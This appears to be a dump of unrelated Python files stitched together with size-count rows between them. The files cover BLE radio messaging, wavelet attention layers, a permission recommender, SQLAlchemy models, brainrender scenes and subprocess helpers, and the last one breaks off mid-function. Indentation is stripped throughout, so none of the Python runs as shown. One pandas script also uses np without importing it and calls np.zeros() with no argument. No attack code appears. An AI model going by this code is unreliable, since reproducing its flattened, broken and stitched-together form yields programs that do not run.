def perform_VPR(features_query_local,ref_map_features):
total_Ref_Images=len(ref_map_features)
confusion_vector=np.zeros(total_Ref_Images)
# print(features_query_local)
for j in range(total_Ref_Images):
match_score=1-(np.sum(abs(np.subtract(features_query_local,ref_map_features[j])))/(256*256))
# match_score=np.sum(np.dot(features_query_local,ref_map_features[j].T))/(256*256)
confusion_vector[j]=match_score
# print(np.amax(confusion_vector), np.argmax(confusion_vector))
return np.amax(confusion_vector), np.argmax(confusion_vector), confusion_vector
| 8,765 | 3,393 |
# SPDX-FileCopyrightText: 2019 Nicholas H. Tollervey for Adafruit Industries
#
# SPDX-License-Identifier: MIT
"""
`adafruit_ble_radio`
================================================================================
Simple byte and string based inter-device communication via BLE.
* Author(s): Nicholas H.Tollervey for Adafruit Industries
**Hardware:**
Adafruit Feather nRF52840 Express <https://www.adafruit.com/product/4062>
Adafruit Circuit Playground Bluefruit <https://www.adafruit.com/product/4333>
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the supported boards:
https://github.com/adafruit/circuitpython/releases
"""
import time
import struct
from micropython import const
from adafruit_ble import BLERadio
from adafruit_ble.advertising import Advertisement, LazyObjectField
from adafruit_ble.advertising.standard import ManufacturerData
__version__ = "0.3.3"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_BLE_Radio.git"
#: Maximum length of a message (in bytes).
MAX_LENGTH = 248
#: Amount of time to advertise a message (in seconds).
AD_DURATION = 0.5
_MANUFACTURING_DATA_ADT = const(0xFF)
_ADAFRUIT_COMPANY_ID = const(0x0822)
_RADIO_DATA_ID = const(0x0001) # TODO: check this isn't already taken.
class _RadioAdvertisement(Advertisement):
"""Broadcast arbitrary bytes as a radio message."""
match_prefixes = (struct.pack("<BH", 0xFF, _ADAFRUIT_COMPANY_ID),)
manufacturer_data = LazyObjectField(
ManufacturerData,
"manufacturer_data",
advertising_data_type=_MANUFACTURING_DATA_ADT,
company_id=_ADAFRUIT_COMPANY_ID,
key_encoding="<H",
)
@classmethod
def matches(cls, entry):
"""Checks for ID matches"""
if len(entry.advertisement_bytes) < 6:
return False
# Check the key position within the manufacturer data. We already know
# prefix matches so we don't need to check it twice.
return (
struct.unpack_from("<H", entry.advertisement_bytes, 5)[0] == _RADIO_DATA_ID
)
@property
def msg(self):
"""Raw radio data"""
if _RADIO_DATA_ID not in self.manufacturer_data.data:
return b""
return self.manufacturer_data.data[_RADIO_DATA_ID]
@msg.setter
def msg(self, value):
self.manufacturer_data.data[_RADIO_DATA_ID] = value
class Radio:
"""
Represents a connection through which one can send or receive strings
and bytes. The radio can be tuned to a specific channel upon initialisation
or via the `configure` method.
"""
def __init__(self, **args):
"""
Takes the same configuration arguments as the `configure` method.
"""
# For BLE related operations.
self.ble = BLERadio()
# The uid for outgoing message. Incremented by one on each send, up to
# 255 when it's reset to 0.
self.uid = 0
# Contains timestamped message metadata to mitigate report of
# receiving of duplicate messages within AD_DURATION time frame.
self.msg_pool = set()
# Handle user related configuration.
self.configure(**args)
def configure(self, channel=42):
"""
Set configuration values for the radio.
:param int channel: The channel (0-255) the radio is listening /
broadcasting on.
"""
if -1 < channel < 256:
self._channel = channel
else:
raise ValueError("Channel must be in range 0-255")
def send(self, message):
"""
Send a message string on the channel to which the radio is
broadcasting.
:param str message: The message string to broadcast.
"""
return self.send_bytes(message.encode("utf-8"))
def send_bytes(self, message):
"""
Send bytes on the channel to which the radio is broadcasting.
:param bytes message: The bytes to broadcast.
"""
# Ensure length of message.
if len(message) > MAX_LENGTH:
raise ValueError("Message too long (max length = {})".format(MAX_LENGTH))
advertisement = _RadioAdvertisement()
# Concatenate the bytes that make up the advertised message.
advertisement.msg = struct.pack("<BB", self._channel, self.uid) + message
self.uid = (self.uid + 1) % 255
# Advertise (block) for AD_DURATION period of time.
self.ble.start_advertising(advertisement)
time.sleep(AD_DURATION)
self.ble.stop_advertising()
def receive(self):
"""
Returns a message received on the channel on which the radio is
listening.
:return: A string representation of the received message, or else None.
"""
msg = self.receive_full()
if msg:
return msg[0].decode("utf-8").replace("\x00", "")
return None
def receive_full(self):
"""
Returns a tuple containing three values representing a message received
on the channel on which the radio is listening. If no message was
received then `None` is returned.
The three values in the tuple represent:
* the bytes received.
* the RSSI (signal strength: 0 = max, -255 = min).
* a microsecond timestamp: the value returned by time.monotonic() when
the message was received.
:return: A tuple representation of the received message, or else None.
"""
try:
for entry in self.ble.start_scan(
_RadioAdvertisement, minimum_rssi=-255, timeout=1, extended=True
):
# Extract channel and unique message ID bytes.
chan, uid = struct.unpack("<BB", entry.msg[:2])
if chan == self._channel:
now = time.monotonic()
addr = entry.address.address_bytes
# Ensure this message isn't a duplicate. Message metadata
# is a tuple of (now, chan, uid, addr), to (mostly)
# uniquely identify a specific message in a certain time
# window.
expired_metadata = set()
duplicate = False
for msg_metadata in self.msg_pool:
if msg_metadata[0] < now - AD_DURATION:
# Ignore expired entries and mark for removal.
expired_metadata.add(msg_metadata)
elif (chan, uid, addr) == msg_metadata[1:]:
# Ignore matched messages to avoid duplication.
duplicate = True
# Remove expired entries.
self.msg_pool = self.msg_pool - expired_metadata
if not duplicate:
# Add new message's metadata to the msg_pool and
# return it as a result.
self.msg_pool.add((now, chan, uid, addr))
msg = entry.msg[2:]
return (msg, entry.rssi, now)
finally:
self.ble.stop_scan()
return None
| 7,228 | 2,075 |
#!/user/bin/python
'''FibonacciList(n)
create an array F[0... n]
F[0] <- 0
F[1] <- 1
for i from 2 to n:
F[i] <- F[i-1] + F[i-2]
return F[n]
'''
def fibonacci_recurs(n):
if (n <= 1):
return n
else:
return fibonacci_recurs(n - 1) + fibonacci_recurs(n - 2)
def fibonacci_iter(n):
fib = []
fib.append(0)
fib.append(1)
for i in range(2, n + 1):
fib.append(fib[i - 1] + fib[i - 2])
return fib[n]
if __name__ == "__main__":
print(fibonacci_iter(10))
| 536 | 250 |
from sqlalchemy import Boolean
from sqlalchemy import Column
from sqlalchemy import DateTime
from sqlalchemy import ForeignKey
from sqlalchemy import String
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.orm import relationship
from pynYNAB.schema.Entity import Entity, Base
from pynYNAB.schema.types import ArrayType
class CatalogEntity(Entity):
@declared_attr
def parent_id(self):
return Column(ForeignKey('catalog.id'))
@declared_attr
def parent(self):
return relationship('Catalog')
class CatalogBudget(Base, CatalogEntity):
budget_name = Column(String)
created_at = Column(DateTime)
class User(Base, CatalogEntity):
username = Column(String)
trial_expires_on = Column(String)
email = Column(String)
feature_flags = Column(ArrayType)
is_subscribed = Column(Boolean)
class UserSetting(Base, CatalogEntity):
setting_name = Column(String)
user_id = Column(ForeignKey('user.id'))
user = relationship('User', foreign_keys=user_id, backref='settings')
setting_value = Column(String)
class UserBudget(Base, CatalogEntity):
budget_id = Column(ForeignKey('catalogbudget.id'))
budget = relationship('CatalogBudget')
user_id = Column(ForeignKey('user.id'))
user = relationship('User', foreign_keys=user_id, backref='budgets')
permissions = Column(String)
class BudgetVersion(Base, CatalogEntity):
date_format = Column(String)
last_accessed_on = Column(String)
currency_format = Column(String)
budget_id = Column(ForeignKey('catalogbudget.id'))
budget = relationship('CatalogBudget', foreign_keys=budget_id)
version_name = Column(String)
source = Column(String)
| 1,715 | 516 |
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from torch import Tensor
from typing import List, Tuple
import math
from functools import partial
from einops import rearrange, reduce, repeat
from torch import nn, einsum, diagonal
from math import log2, ceil
import pdb
from utils.masking import LocalMask
from layers.utils import get_filter
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class MultiWaveletTransform(nn.Module):
"""
1D multiwavelet block.
"""
def __init__(self, ich=1, k=8, alpha=16, c=128,
nCZ=1, L=0, base='legendre', attention_dropout=0.1):
super(MultiWaveletTransform, self).__init__()
print('base', base)
self.k = k
self.c = c
self.L = L
self.nCZ = nCZ
self.Lk0 = nn.Linear(ich, c * k)
self.Lk1 = nn.Linear(c * k, ich)
self.ich = ich
self.MWT_CZ = nn.ModuleList(MWT_CZ1d(k, alpha, L, c, base) for i in range(nCZ))
def forward(self, queries, keys, values, attn_mask):
B, L, H, E = queries.shape
_, S, _, D = values.shape
if L > S:
zeros = torch.zeros_like(queries[:, :(L - S), :]).float()
values = torch.cat([values, zeros], dim=1)
keys = torch.cat([keys, zeros], dim=1)
else:
values = values[:, :L, :, :]
keys = keys[:, :L, :, :]
values = values.view(B, L, -1)
V = self.Lk0(values).view(B, L, self.c, -1)
for i in range(self.nCZ):
V = self.MWT_CZ[i](V)
if i < self.nCZ - 1:
V = F.relu(V)
V = self.Lk1(V.view(B, L, -1))
V = V.view(B, L, -1, D)
return (V.contiguous(), None)
class MultiWaveletCross(nn.Module):
"""
1D Multiwavelet Cross Attention layer.
"""
def __init__(self, in_channels, out_channels, seq_len_q, seq_len_kv, modes, c=64,
k=8, ich=512,
L=0,
base='legendre',
mode_select_method='random',
initializer=None, activation='tanh',
**kwargs):
super(MultiWaveletCross, self).__init__()
print('base', base)
self.c = c
self.k = k
self.L = L
H0, H1, G0, G1, PHI0, PHI1 = get_filter(base, k)
H0r = H0 @ PHI0
G0r = G0 @ PHI0
H1r = H1 @ PHI1
G1r = G1 @ PHI1
H0r[np.abs(H0r) < 1e-8] = 0
H1r[np.abs(H1r) < 1e-8] = 0
G0r[np.abs(G0r) < 1e-8] = 0
G1r[np.abs(G1r) < 1e-8] = 0
self.max_item = 3
self.attn1 = FourierCrossAttentionW(in_channels=in_channels, out_channels=out_channels, seq_len_q=seq_len_q,
seq_len_kv=seq_len_kv, modes=modes, activation=activation,
mode_select_method=mode_select_method)
self.attn2 = FourierCrossAttentionW(in_channels=in_channels, out_channels=out_channels, seq_len_q=seq_len_q,
seq_len_kv=seq_len_kv, modes=modes, activation=activation,
mode_select_method=mode_select_method)
self.attn3 = FourierCrossAttentionW(in_channels=in_channels, out_channels=out_channels, seq_len_q=seq_len_q,
seq_len_kv=seq_len_kv, modes=modes, activation=activation,
mode_select_method=mode_select_method)
self.attn4 = FourierCrossAttentionW(in_channels=in_channels, out_channels=out_channels, seq_len_q=seq_len_q,
seq_len_kv=seq_len_kv, modes=modes, activation=activation,
mode_select_method=mode_select_method)
self.T0 = nn.Linear(k, k)
self.register_buffer('ec_s', torch.Tensor(
np.concatenate((H0.T, H1.T), axis=0)))
self.register_buffer('ec_d', torch.Tensor(
np.concatenate((G0.T, G1.T), axis=0)))
self.register_buffer('rc_e', torch.Tensor(
np.concatenate((H0r, G0r), axis=0)))
self.register_buffer('rc_o', torch.Tensor(
np.concatenate((H1r, G1r), axis=0)))
self.Lk = nn.Linear(ich, c * k)
self.Lq = nn.Linear(ich, c * k)
self.Lv = nn.Linear(ich, c * k)
self.out = nn.Linear(c * k, ich)
self.modes1 = modes
def forward(self, q, k, v, mask=None):
B, N, H, E = q.shape # (B, N, H, E) torch.Size([3, 768, 8, 2])
_, S, _, _ = k.shape # (B, S, H, E) torch.Size([3, 96, 8, 2])
q = q.view(q.shape[0], q.shape[1], -1)
k = k.view(k.shape[0], k.shape[1], -1)
v = v.view(v.shape[0], v.shape[1], -1)
q = self.Lq(q)
q = q.view(q.shape[0], q.shape[1], self.c, self.k)
k = self.Lk(k)
k = k.view(k.shape[0], k.shape[1], self.c, self.k)
v = self.Lv(v)
v = v.view(v.shape[0], v.shape[1], self.c, self.k)
if N > S:
zeros = torch.zeros_like(q[:, :(N - S), :]).float()
v = torch.cat([v, zeros], dim=1)
k = torch.cat([k, zeros], dim=1)
else:
v = v[:, :N, :, :]
k = k[:, :N, :, :]
ns = math.floor(np.log2(N))
nl = pow(2, math.ceil(np.log2(N)))
extra_q = q[:, 0:nl - N, :, :]
extra_k = k[:, 0:nl - N, :, :]
extra_v = v[:, 0:nl - N, :, :]
q = torch.cat([q, extra_q], 1)
k = torch.cat([k, extra_k], 1)
v = torch.cat([v, extra_v], 1)
Ud_q = torch.jit.annotate(List[Tuple[Tensor]], [])
Ud_k = torch.jit.annotate(List[Tuple[Tensor]], [])
Ud_v = torch.jit.annotate(List[Tuple[Tensor]], [])
Us_q = torch.jit.annotate(List[Tensor], [])
Us_k = torch.jit.annotate(List[Tensor], [])
Us_v = torch.jit.annotate(List[Tensor], [])
Ud = torch.jit.annotate(List[Tensor], [])
Us = torch.jit.annotate(List[Tensor], [])
# decompose
for i in range(ns - self.L):
# print('q shape',q.shape)
d, q = self.wavelet_transform(q)
Ud_q += [tuple([d, q])]
Us_q += [d]
for i in range(ns - self.L):
d, k = self.wavelet_transform(k)
Ud_k += [tuple([d, k])]
Us_k += [d]
for i in range(ns - self.L):
d, v = self.wavelet_transform(v)
Ud_v += [tuple([d, v])]
Us_v += [d]
for i in range(ns - self.L):
dk, sk = Ud_k[i], Us_k[i]
dq, sq = Ud_q[i], Us_q[i]
dv, sv = Ud_v[i], Us_v[i]
Ud += [self.attn1(dq[0], dk[0], dv[0], mask)[0] + self.attn2(dq[1], dk[1], dv[1], mask)[0]]
Us += [self.attn3(sq, sk, sv, mask)[0]]
v = self.attn4(q, k, v, mask)[0]
# reconstruct
for i in range(ns - 1 - self.L, -1, -1):
v = v + Us[i]
v = torch.cat((v, Ud[i]), -1)
v = self.evenOdd(v)
v = self.out(v[:, :N, :, :].contiguous().view(B, N, -1))
return (v.contiguous(), None)
def wavelet_transform(self, x):
xa = torch.cat([x[:, ::2, :, :],
x[:, 1::2, :, :],
], -1)
d = torch.matmul(xa, self.ec_d)
s = torch.matmul(xa, self.ec_s)
return d, s
def evenOdd(self, x):
B, N, c, ich = x.shape # (B, N, c, k)
assert ich == 2 * self.k
x_e = torch.matmul(x, self.rc_e)
x_o = torch.matmul(x, self.rc_o)
x = torch.zeros(B, N * 2, c, self.k,
device=x.device)
x[..., ::2, :, :] = x_e
x[..., 1::2, :, :] = x_o
return x
class FourierCrossAttentionW(nn.Module):
def __init__(self, in_channels, out_channels, seq_len_q, seq_len_kv, modes=16, activation='tanh',
mode_select_method='random'):
super(FourierCrossAttentionW, self).__init__()
print('corss fourier correlation used!')
self.in_channels = in_channels
self.out_channels = out_channels
self.modes1 = modes
self.activation = activation
def forward(self, q, k, v, mask):
B, L, E, H = q.shape
xq = q.permute(0, 3, 2, 1) # size = [B, H, E, L] torch.Size([3, 8, 64, 512])
xk = k.permute(0, 3, 2, 1)
xv = v.permute(0, 3, 2, 1)
self.index_q = list(range(0, min(int(L // 2), self.modes1)))
self.index_k_v = list(range(0, min(int(xv.shape[3] // 2), self.modes1)))
# Compute Fourier coefficients
xq_ft_ = torch.zeros(B, H, E, len(self.index_q), device=xq.device, dtype=torch.cfloat)
xq_ft = torch.fft.rfft(xq, dim=-1)
for i, j in enumerate(self.index_q):
xq_ft_[:, :, :, i] = xq_ft[:, :, :, j]
xk_ft_ = torch.zeros(B, H, E, len(self.index_k_v), device=xq.device, dtype=torch.cfloat)
xk_ft = torch.fft.rfft(xk, dim=-1)
for i, j in enumerate(self.index_k_v):
xk_ft_[:, :, :, i] = xk_ft[:, :, :, j]
xqk_ft = (torch.einsum("bhex,bhey->bhxy", xq_ft_, xk_ft_))
if self.activation == 'tanh':
xqk_ft = xqk_ft.tanh()
elif self.activation == 'softmax':
xqk_ft = torch.softmax(abs(xqk_ft), dim=-1)
xqk_ft = torch.complex(xqk_ft, torch.zeros_like(xqk_ft))
else:
raise Exception('{} actiation function is not implemented'.format(self.activation))
xqkv_ft = torch.einsum("bhxy,bhey->bhex", xqk_ft, xk_ft_)
xqkvw = xqkv_ft
out_ft = torch.zeros(B, H, E, L // 2 + 1, device=xq.device, dtype=torch.cfloat)
for i, j in enumerate(self.index_q):
out_ft[:, :, :, j] = xqkvw[:, :, :, i]
out = torch.fft.irfft(out_ft / self.in_channels / self.out_channels, n=xq.size(-1)).permute(0, 3, 2, 1)
# size = [B, L, H, E]
return (out, None)
class sparseKernelFT1d(nn.Module):
def __init__(self,
k, alpha, c=1,
nl=1,
initializer=None,
**kwargs):
super(sparseKernelFT1d, self).__init__()
self.modes1 = alpha
self.scale = (1 / (c * k * c * k))
self.weights1 = nn.Parameter(self.scale * torch.rand(c * k, c * k, self.modes1, dtype=torch.cfloat))
self.weights1.requires_grad = True
self.k = k
def compl_mul1d(self, x, weights):
# (batch, in_channel, x ), (in_channel, out_channel, x) -> (batch, out_channel, x)
return torch.einsum("bix,iox->box", x, weights)
def forward(self, x):
B, N, c, k = x.shape # (B, N, c, k)
x = x.view(B, N, -1)
x = x.permute(0, 2, 1)
x_fft = torch.fft.rfft(x)
# Multiply relevant Fourier modes
l = min(self.modes1, N // 2 + 1)
# l = N//2+1
out_ft = torch.zeros(B, c * k, N // 2 + 1, device=x.device, dtype=torch.cfloat)
out_ft[:, :, :l] = self.compl_mul1d(x_fft[:, :, :l], self.weights1[:, :, :l])
x = torch.fft.irfft(out_ft, n=N)
x = x.permute(0, 2, 1).view(B, N, c, k)
return x
# ##
class MWT_CZ1d(nn.Module):
def __init__(self,
k=3, alpha=64,
L=0, c=1,
base='legendre',
initializer=None,
**kwargs):
super(MWT_CZ1d, self).__init__()
self.k = k
self.L = L
H0, H1, G0, G1, PHI0, PHI1 = get_filter(base, k)
H0r = H0 @ PHI0
G0r = G0 @ PHI0
H1r = H1 @ PHI1
G1r = G1 @ PHI1
H0r[np.abs(H0r) < 1e-8] = 0
H1r[np.abs(H1r) < 1e-8] = 0
G0r[np.abs(G0r) < 1e-8] = 0
G1r[np.abs(G1r) < 1e-8] = 0
self.max_item = 3
self.A = sparseKernelFT1d(k, alpha, c)
self.B = sparseKernelFT1d(k, alpha, c)
self.C = sparseKernelFT1d(k, alpha, c)
self.T0 = nn.Linear(k, k)
self.register_buffer('ec_s', torch.Tensor(
np.concatenate((H0.T, H1.T), axis=0)))
self.register_buffer('ec_d', torch.Tensor(
np.concatenate((G0.T, G1.T), axis=0)))
self.register_buffer('rc_e', torch.Tensor(
np.concatenate((H0r, G0r), axis=0)))
self.register_buffer('rc_o', torch.Tensor(
np.concatenate((H1r, G1r), axis=0)))
def forward(self, x):
B, N, c, k = x.shape # (B, N, k)
ns = math.floor(np.log2(N))
nl = pow(2, math.ceil(np.log2(N)))
extra_x = x[:, 0:nl - N, :, :]
x = torch.cat([x, extra_x], 1)
Ud = torch.jit.annotate(List[Tensor], [])
Us = torch.jit.annotate(List[Tensor], [])
# decompose
for i in range(ns - self.L):
# print('x shape',x.shape)
d, x = self.wavelet_transform(x)
Ud += [self.A(d) + self.B(x)]
Us += [self.C(d)]
x = self.T0(x) # coarsest scale transform
# reconstruct
for i in range(ns - 1 - self.L, -1, -1):
x = x + Us[i]
x = torch.cat((x, Ud[i]), -1)
x = self.evenOdd(x)
x = x[:, :N, :, :]
return x
def wavelet_transform(self, x):
xa = torch.cat([x[:, ::2, :, :],
x[:, 1::2, :, :],
], -1)
d = torch.matmul(xa, self.ec_d)
s = torch.matmul(xa, self.ec_s)
return d, s
def evenOdd(self, x):
B, N, c, ich = x.shape # (B, N, c, k)
assert ich == 2 * self.k
x_e = torch.matmul(x, self.rc_e)
x_o = torch.matmul(x, self.rc_o)
x = torch.zeros(B, N * 2, c, self.k,
device=x.device)
x[..., ::2, :, :] = x_e
x[..., 1::2, :, :] = x_o
return x | 13,775 | 5,592 |
# encoding=utf-8
import os
import fire
import numpy as np
from scipy.sparse.csr import csr_matrix
from sklearn.base import BaseEstimator
from sklearn.model_selection import cross_validate
from sklearn.preprocessing import normalize
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from .common.similarities import SIM_FUNCTIONS
from .common.dataset import prepare_shuffled_dataset
from .common.scorers import map_scorer, trr_scorer, nr_scorer
from .executor import BaseExecutor
SCORING = {
'MAP': map_scorer,
'TRR': trr_scorer,
'NR': nr_scorer
}
def do_nothing_tokenizer(tokens):
return tokens
class PerRecCBR(BaseEstimator):
"""CBR component for recommending permission lists
Input: A list of used apis.
Output: The ranked permission list of the app.
"""
def __init__(self, sim_func="cosine"):
if callable(sim_func):
self.sim_func = sim_func
else:
self.sim_func = SIM_FUNCTIONS.get(sim_func, None)
if not self.sim_func:
raise ValueError("Error sim_func" + str(sim_func))
@staticmethod
def build_perm_docs(perm_vectors, api_vectors):
"""Build permission profiles
Args:
perm_vectors (Matrix): app perm vectors
api_vectors (Matrix): app api vectors
perm_list (List): list of permissions
"""
perm_docs = []
# for each column of permission vectors (e.g., each permission)
for col in perm_vectors.T:
# find the apps which require this permissions
if isinstance(col, csr_matrix):
col = col.toarray().reshape(-1, )
apps = np.where(col == 1)
# find the api vectors of such apps
cur_api_vectors = api_vectors[apps].toarray()
# construct permission doc
cur_perm_doc = cur_api_vectors.sum(axis=0)
perm_docs.append(cur_perm_doc)
return np.array(perm_docs)
def fit(self, X, y):
"""Build the profiles for training permissions
Args:
X (List(List(API))): The api lists of the training apps.
y (List(List(Perm))): The permission lists of all apps
Returns:
self object: return self
"""
# Steps:
# 1. build permission doc
# 2. calculate the tfidf vector for each permission doc as the profiles of permissions
# 3. build API CountVectorizer
self.api_vectorizer_ = CountVectorizer(binary=True, tokenizer=do_nothing_tokenizer,
preprocessor=None, lowercase=False)
self.train_api_vectors_ = self.api_vectorizer_.fit_transform(X)
self.perm_vectorizer_ = CountVectorizer(binary=True, tokenizer=do_nothing_tokenizer,
preprocessor=None, lowercase=False)
self.train_perm_vectors_ = self.perm_vectorizer_.fit_transform(y)
self.perm_list_ = self.perm_vectorizer_.get_feature_names()
# build permission doc
self.perm_docs_ = self.build_perm_docs(self.train_perm_vectors_, self.train_api_vectors_)
# idf = log(total_num / num) + 1
self.tfidf_transformer_ = TfidfTransformer(norm="l1", use_idf=True, smooth_idf=False)
tfidf_matrix = self.tfidf_transformer_.fit_transform(self.perm_docs_)
self.perm_profiles_ = normalize(tfidf_matrix, norm='l2', axis=1)
def transform(self, X, *fit_params):
"""Recommend permissions for new apps
Args:
X (List(List(API))): A list of apps for testing.
Returns:
Perms (List(List(Permission))): The ranked permission lists recommended for input apps
"""
# ranked the permissions
# construct app profiles (api vectors)
test_api_vectors = self.api_vectorizer_.transform(X)
# calculate the similarities between API vector and permission profiles
# test_num * perm_num
similarities = self.sim_func(test_api_vectors, self.perm_profiles_)
perm_scores = normalize(similarities, norm="l1", axis=1)
# for fusion
self.perm_scores_ = perm_scores
sorted_perm_index = np.argsort(-1.0 * perm_scores, 1)
# each row: perm_i, perm_j, per_k (sorted)
return np.take(self.perm_list_, sorted_perm_index)
def predict(self, X):
return self.transform(X)
class CBR(BaseExecutor):
def __init__(self, dataset, scoring, **kwargs):
super().__init__("CBR", dataset, scoring)
self.sim_func = kwargs.get("sim_func", "cosine")
self.smooth_idf = kwargs.get("smooth_idf", True)
def get_result_file(self, data_dir):
file_name = "_".join([self.name, self.sim_func, str(self.smooth_idf)])
return os.path.join(data_dir, file_name + ".json")
def construct_estimator(self):
return PerRecCBR(sim_func=self.sim_func)
def run(self):
api_lists = self.dataset.extract_api_lists()
perm_lists = self.dataset.extract_perm_lists()
estimator = self.construct_estimator()
scores = cross_validate(estimator, api_lists, perm_lists, scoring=self.scoring, cv=10,
n_jobs=-1, verbose=1, return_train_score=False)
return scores
def main(sim_func="cosine"):
dataset = prepare_shuffled_dataset()
scoring = SCORING
executor = CBR(dataset, scoring, sim_func=sim_func)
scores = executor.run()
print(scores['test_MAP'].mean())
if __name__ == "__main__":
fire.Fire({
'main': main
})
| 5,636 | 1,709 |
# Generated by Django 3.2 on 2021-05-05 12:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('registry', '0040_auto_20210216_1404'),
]
operations = [
migrations.AlterField(
model_name='firmware',
name='binary_file_url',
field=models.URLField(help_text='Enter a url from where the firmware can be downloaded'),
),
migrations.AlterField(
model_name='firmware',
name='public_key',
field=models.TextField(help_text='Enter a SHA / Digest or public key to test used to secure the firmware'),
),
]
| 675 | 217 |
import csv
import sys
import json
import pandas as pd
import os
import logging
# Configure the path
os.chdir('/home/emi/unipd/Sartori_CBSD/project/cbsdproject')
accounts = pd.read_excel('LabelledAccounts.xlsx', skiprows=1)
import operator
import collections
def get_party_label(votes, porcentage=0.75):
porcentage = len(votes)*porcentage
porcentage = int(porcentage)
max_party, max_votes = collections.Counter(votes).most_common(1)[0]
if (max_votes == porcentage):
return max_party
else:
return ''
accounts['party_threshold']=pd.Series(np.zeros())
#Fix a threshold about the political party labelling
#(we suggest to repeat the analysis with the 100% of agreement of the five judges
#and with the 75% of agreement of the five judges)
data = pd.read_csv('Tweets/Massimogazza_tweets.csv')
data.head()
| 847 | 296 |
import itertools
import random
import orco
# Function that trains "players"
@orco.builder()
def train_player(config):
# We will simulate trained players by a dictionary with a "strength" key
return {"strength": random.randint(0, 10)}
# Build function for "games"
@orco.builder()
def play_game(config):
player1 = train_player(config["player1"])
player2 = train_player(config["player2"])
yield
# Simulation of playing a game between two players,
# They just throw k-sided dices, where k is trength of the player
# The difference of throw is the result
r1 = random.randint(0, player1.value["strength"] * 2)
r2 = random.randint(0, player2.value["strength"] * 2)
return r1 - r2
# Build function for a tournament, return score for each player
@orco.builder()
def play_tournament(config):
# For evaluating a tournament, we need to know the results of games between
# each pair of its players.
games = [
play_game({"player1": p1, "player2": p2})
for (p1, p2) in itertools.product(config["players"], config["players"])
]
yield
score = {}
for game in games:
player1 = game.config["player1"]
player2 = game.config["player2"]
score.setdefault(player1, 0)
score.setdefault(player2, 0)
score[player1] += game.value
score[player2] -= game.value
return score
orco.run_cli()
| 1,410 | 449 |
import os
from pathlib import Path
import brainrender
from brainrender import Scene, actor, Animation
from rich import color, print
from myterial import orange
from vedo import Volume, io, load, show
import numpy as np
import pandas as pd
import util
# path names and roi names
paths = util.get_paths()
roi_names = util.roi_names()
print(f"[{orange}]Running example: {Path(__file__).name}")
# Create a brainrender scene
scene = Scene(title="Injection ROIs", atlas_name='allen_mouse_10um')
# injection site meshes
mesh_names = [os.path.join(paths['data'], 'meshes', f'{roi}.obj') for roi in roi_names]
meshes = [load(cur_name) for cur_name in mesh_names]
# overlapping atlas rois
csv_names_atlas = [os.path.join(paths['data'], 'csv_acronyms', f'{roi}.csv') for roi in roi_names]
csv_atlas_acronym = [pd.read_csv(name) for name in csv_names_atlas]
colors = ['#6DB546', '#C30017', '#9D9D9C']
alpha_rois = 0.6
for cur_idx, cur_mesh in enumerate(meshes):
# Create the injection site actors
cur_actor = actor.Actor(cur_mesh,
name=roi_names[cur_idx],
color=colors[cur_idx],
alpha=alpha_rois)
scene.add(cur_actor)
scene.add_silhouette(cur_actor)
# Overlapping atlas
cur_overlapping_acronyms = list(csv_atlas_acronym[cur_idx]["acronym_keepSingleChild"])
# scene.add_brain_region(*cur_overlapping_acronyms,
# alpha=0.2,
# color=colors[cur_idx],
# hemisphere='right')
# Render and save screen shots
screen_shot_dir = os.path.join(paths['data'], 'screen_shots_no_region')
os.makedirs(screen_shot_dir, exist_ok = True)
camera_names = list(brainrender.camera.cameras.keys())
zoom_vals = [2.0, 0.8, 1.0, 1.0, 1.0, 1.0]
for idx, c in enumerate(camera_names):
scene.render(camera=c, zoom=zoom_vals[idx], interactive=False)
scene.screenshot(name=os.path.join(screen_shot_dir, f'{c}_alpha_{alpha_rois}.png'))
# Animation
animate_flag = True
if animate_flag:
anim = Animation(scene, screen_shot_dir, "ROI_inj_animation",size="6480x4200")
# Specify camera position and zoom at some key frames
# each key frame defines the scene's state after n seconds have passed
anim.add_keyframe(0, camera="top", zoom=0.3)
anim.add_keyframe(5, camera="sagittal", zoom=1.0)
anim.add_keyframe(9, camera="frontal", zoom=1.0)
anim.add_keyframe(
10,
camera="frontal",
)
# Make videos
anim.make_video(duration=10, fps=10) | 2,546 | 919 |
"""WizardKit: Execution functions"""
#vim: sts=2 sw=2 ts=2
import json
import logging
import os
import re
import subprocess
import time
from threading import Thread
from queue import Queue, Empty
import psutil
# STATIC VARIABLES
LOG = logging.getLogger(__name__)
# Classes
class NonBlockingStreamReader():
"""Class to allow non-blocking reads from a stream."""
# pylint: disable=too-few-public-methods
# Credits:
## https://gist.github.com/EyalAr/7915597
## https://stackoverflow.com/a/4896288
def __init__(self, stream):
self.stream = stream
self.queue = Queue()
def populate_queue(stream, queue):
"""Collect lines from stream and put them in queue."""
while not stream.closed:
try:
line = stream.read(1)
except ValueError:
# Assuming the stream was closed
line = None
if line:
queue.put(line)
self.thread = start_thread(
populate_queue,
args=(self.stream, self.queue),
)
def stop(self):
"""Stop reading from input stream."""
self.stream.close()
def read(self, timeout=None):
"""Read from queue if possible, returns item from queue."""
try:
return self.queue.get(block=timeout is not None, timeout=timeout)
except Empty:
return None
def save_to_file(self, proc, out_path):
"""Continuously save output to file while proc is running."""
LOG.debug('Saving process %s output to %s', proc, out_path)
while proc.poll() is None:
out = b''
out_bytes = b''
while out is not None:
out = self.read(0.1)
if out:
out_bytes += out
with open(out_path, 'a', encoding='utf-8') as _f:
_f.write(out_bytes.decode('utf-8', errors='ignore'))
# Close stream to prevent 100% CPU usage
self.stream.close()
# Functions
def build_cmd_kwargs(cmd, minimized=False, pipe=True, shell=False, **kwargs):
"""Build kwargs for use by subprocess functions, returns dict.
Specifically subprocess.run() and subprocess.Popen().
NOTE: If no encoding specified then UTF-8 will be used.
"""
LOG.debug(
'cmd: %s, minimized: %s, pipe: %s, shell: %s, kwargs: %s',
cmd, minimized, pipe, shell, kwargs,
)
cmd_kwargs = {
'args': cmd,
'shell': shell,
}
# Strip sudo if appropriate
if cmd[0] == 'sudo':
if os.name == 'posix' and os.geteuid() == 0: # pylint: disable=no-member
cmd.pop(0)
# Add additional kwargs if applicable
for key in 'check cwd encoding errors stderr stdin stdout'.split():
if key in kwargs:
cmd_kwargs[key] = kwargs[key]
# Default to UTF-8 encoding
if not ('encoding' in cmd_kwargs or 'errors' in cmd_kwargs):
